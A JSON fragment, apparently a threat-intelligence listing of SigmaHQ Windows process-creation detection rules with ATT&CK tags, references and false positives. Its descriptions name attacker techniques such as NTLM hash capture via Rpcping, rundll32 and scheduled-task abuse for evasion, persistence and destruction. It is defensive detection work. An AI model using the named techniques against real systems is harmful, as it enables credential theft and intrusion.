"description": "Detects execution of renamed version of PAExec. Often used by attackers", - "uuid": "c4e49831-1496-40cf-8ce1-b53f942b02f9", - "value": "Renamed PAExec", - "meta": { - "refs": [ - "https://www.poweradmin.com/paexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2021/05/22", - "filename": "proc_creation_win_susp_renamed_paexec.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", - "uuid": "93671f99-04eb-4ab4-a161-70d446a84003", - "value": "Capture Credentials with Rpcping.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", - "https://twitter.com/vysecurity/status/974806438316072960", - "https://twitter.com/vysecurity/status/873181705024266241", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_susp_rpcping.yml", - "author": "Julia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": 
"process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process related to rundll32 based on arguments", - "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9", - "value": "Suspicious Rundll32 Activity", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", - "https://twitter.com/Hexacorn/status/885258886428725250", - "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", - "https://twitter.com/nas_bench/status/1433344116071583746", - "https://twitter.com/eral4m/status/1479106975967240209", - "https://twitter.com/eral4m/status/1479080793003671557", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_rundll32_activity.yml", - "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "uuid": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "value": "Suspicious Call by Ordinal", - "meta": { - "refs": [ - "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", - "https://github.com/Neo23x0/DLLRunner", - "https://twitter.com/cyb3rops/status/1186631731543236608", - "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - 
"creation_date": "2019/10/22", - "filename": "proc_creation_win_susp_rundll32_by_ordinal.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", - "uuid": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", - "value": "Suspicious Rundll32 Invoking Inline VBScript", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "creation_date": "2021/03/05", - "filename": "proc_creation_win_susp_rundll32_inline_vbs.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "uuid": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", - "value": "Rundll32 JS RunHTMLApplication Pattern", - "meta": { - "refs": [ - "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/01/14", - "filename": "proc_creation_win_susp_rundll32_js_runhtmlapplication.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], 
- "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c", - "value": "Suspicious Key Manager Access", - "meta": { - "refs": [ - "https://twitter.com/NinjaParanoid/status/1516442028963659777", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ], - "creation_date": "2022/04/21", - "filename": "proc_creation_win_susp_rundll32_keymgr.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a", - "value": "Suspicious Rundll32 Without Any CommandLine Params", - "meta": { - "refs": [ - "https://www.cobaltstrike.com/help-opsec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2021/05/27", - "filename": "proc_creation_win_susp_rundll32_no_params.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Possible but rare" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process related to rundll32 based on arguments", - "uuid": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", - "value": "Suspicious Rundll32 Script in CommandLine", - "meta": { - "refs": [ - "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2021/12/04", - "filename": "proc_creation_win_susp_rundll32_script_run.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", - "uuid": "285b85b1-a555-4095-8652-a8a4106af63f", - "value": "Suspicious Rundll32 Setupapi.dll Activity", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", - "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", - "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", - "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml", - "author": 
"Konstantin Grishchenko, oscd.community", - "level": "medium", - "falsepositive": [ - "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b", - "value": "RunDLL32 Spawning Explorer", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_spawn_explorer.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2022/04/27", - "filename": "proc_creation_win_susp_rundll32_spawn_explorer.yml", - "author": "elhoim, CD_ROM_", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", - "uuid": "731231b9-0b5d-4219-94dd-abb6959aa7ea", - "value": "Suspicious Rundll32 Activity Invoking Sys File", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2021/03/05", - "filename": "proc_creation_win_susp_rundll32_sys.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious 
call to the user32.dll function that locks the user workstation", - "uuid": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", - "value": "Suspicious Workstation Locking via Rundll32", - "meta": { - "refs": [ - "https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_user32_dll.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/06/04", - "filename": "proc_creation_win_susp_rundll32_user32_dll.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects the execution of Run Once task as configured in the registry", - "uuid": "198effb6-6c98-4d0c-9ea3-451fa143c45c", - "value": "Run Once Task Execution as Configured in Registry", - "meta": { - "refs": [ - "https://twitter.com/pabraeken/status/990717080805789697", - "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_susp_runonce_execution.yml", - "author": "Avneet Singh @v3t0_, oscd.community", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of powershell scripts via Runscripthelper.exe", - "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03", - "value": "Suspicious Runscripthelper.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runscripthelper.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_susp_runscripthelper.yml", - "author": "Victor Sergeev, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process run from unusual locations", - "uuid": "15b75071-74cc-47e0-b4c6-b43744a62a2b", - "value": "Suspicious Process Start Locations", - "meta": { - "refs": [ - "https://car.mitre.org/wiki/CAR-2013-05-002", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_run_locations.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "car.2013-05-002" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_run_locations.yml", - "author": "juju4, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of Remote Utilities RAT (RURAT) from an unsual location (outisde of 'C:\\Program Files')", - "uuid": "e01fa958-6893-41d4-ae03-182477c5e77d", - "value": "Execution of Remote Utilities RAT (RURAT) From Unusual Location", - "meta": { - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/19", - "filename": "proc_creation_win_susp_rurat_exec_location.yml", - "author": "Nasreddine Bencherchali", - 
"level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "value": "Suspicious Modification Of Scheduled Tasks", - "meta": { - "refs": [ - "Internal Research", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/07/28", - "filename": "proc_creation_win_susp_schtasks_change.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when adversaries stop services or processes by deleting their respective schdueled tasks in order to conduct data destructive activities", - "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", - "value": "Delete Important Scheduled Task", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_susp_schtasks_delete.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage 
of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "uuid": "220457c1-1c9f-4c2e-afe6-9598926222c1", - "value": "Delete All Scheduled Tasks", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_susp_schtasks_delete_all.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities", - "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", - "value": "Disable Important Scheduled Task", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", - "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ], - "creation_date": "2021/12/26", - "filename": "proc_creation_win_susp_schtasks_disable.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Schtask creations that point to a 
suspicious folder or an environment variable often used by malware", - "uuid": "81325ce1-be01-4250-944f-b4789644556f", - "value": "Suspicious Schtasks From Env Var Folder", - "meta": { - "refs": [ - "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", - "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/02/21", - "filename": "proc_creation_win_susp_schtasks_env_folder.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", - "value": "Schtasks From Suspicious Folders", - "meta": { - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/04/15", - "filename": "proc_creation_win_susp_schtasks_folder_combos.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", - "uuid": "9494479d-d994-40bf-a8b1-eea890237021", - "value": 
"Suspicious Add Scheduled Task Parent", - "meta": { - "refs": [ - "https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/02/23", - "filename": "proc_creation_win_susp_schtasks_parent.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Software installers that run from temporary folders and also install scheduled tasks" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad", - "value": "Suspicious Add Scheduled Command Pattern", - "meta": { - "refs": [ - "https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/02/23", - "filename": "proc_creation_win_susp_schtasks_pattern.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Software installers that run from temporary folders and also install scheduled tasks" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects scheduled task creations or modification on a suspicious schedule type", - "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98", - "value": "Suspicious Schtasks Schedule Types", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_susp_schtasks_schedule_type.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitmate processes that run at logon. Filter according to your environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", - "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a", - "value": "Suspicious Schtasks Schedule Type With High Privileges", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2022/08/31", - "filename": "proc_creation_win_susp_schtasks_schedule_type_system.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Some installers were seen using this method of creation unfortunately. 
Filter them in your environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "schtasks.exe create task from user AppData\\Local\\Temp", - "uuid": "43f487f0-755f-4c2a-bce7-d6d2eec2fcf8", - "value": "Suspicious Add Scheduled Task From User AppData Temp", - "meta": { - "refs": [ - "malware analyse https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_user_temp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1053.005" - ], - "creation_date": "2021/11/03", - "filename": "proc_creation_win_susp_schtasks_user_temp.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of scheduled tasks in user session", - "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189", - "value": "Scheduled Task Creation", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.005", - "attack.s0111", - "car.2013-08-001" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_schtask_creation.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Administrative activity", - "Software installation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", - "value": "Suspicious Scheduled Task Creation Involving Temp Folder", - "meta": { - "refs": [ - 
"https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" - ], - "creation_date": "2021/03/11", - "filename": "proc_creation_win_susp_schtask_creation_temp_folder.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative activity", - "Software installation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", - "uuid": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", - "value": "ScreenConnect Remote Access", - "meta": { - "refs": [ - "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ], - "creation_date": "2021/02/11", - "filename": "proc_creation_win_susp_screenconnect_access.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use by administrative staff" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", - "value": "Suspicious ScreenSave Change by Reg.exe", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", - "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.002" - ], - "creation_date": "2021/08/19", - "filename": "proc_creation_win_susp_screensaver_reg.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "GPO" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious file execution by wscript and cscript", - "uuid": "1e33157c-53b1-41ad-bbcc-780b80b58288", - "value": "WSF/JSE/JS/VBA/VBE File Execution", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_script_execution.yml", - "author": "Michael Haag", - "level": "medium", - "falsepositive": [ - "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", - "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", - "value": "Script Interpreter Execution From Suspicious Folder", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/02/08", - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious script executions from temporary folder", - "uuid": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", - "value": "Suspicious Script Execution From Temp Folder", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2021/07/14", - "filename": "proc_creation_win_susp_script_exec_from_temp.yml", - "author": "Florian Roth, Max Altgelt, Tim Shelton", - "level": "high", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential suspicious behaviour using secedit.exe. 
Such as exporting or modifying the security policy", - "uuid": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", - "value": "Potential Suspicious Activity Using SeCEdit", - "meta": { - "refs": [ - "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", - "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" - ], - "tags": [ - "attack.discovery", - "attack.persistence", - "attack.defense_evasion", - "attack.credential_access", - "attack.privilege_escalation", - "attack.t1562.002", - "attack.t1547.001", - "attack.t1505.005", - "attack.t1556.002", - "attack.t1562", - "attack.t1574.007", - "attack.t1564.002", - "attack.t1546.008", - "attack.t1546.007", - "attack.t1547.014", - "attack.t1547.010", - "attack.t1547.002", - "attack.t1557", - "attack.t1082" - ], - "creation_date": "2022/11/18", - "filename": "proc_creation_win_susp_secedit.yml", - "author": "Janantha Marasinghe", - "level": "medium", - "falsepositive": [ - "Legitimate administrative use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious DACL modifications that can be used to hide services or make them unstopable", - "uuid": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "value": "Suspicious Service DACL Modification", - "meta": { - "refs": [ - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - 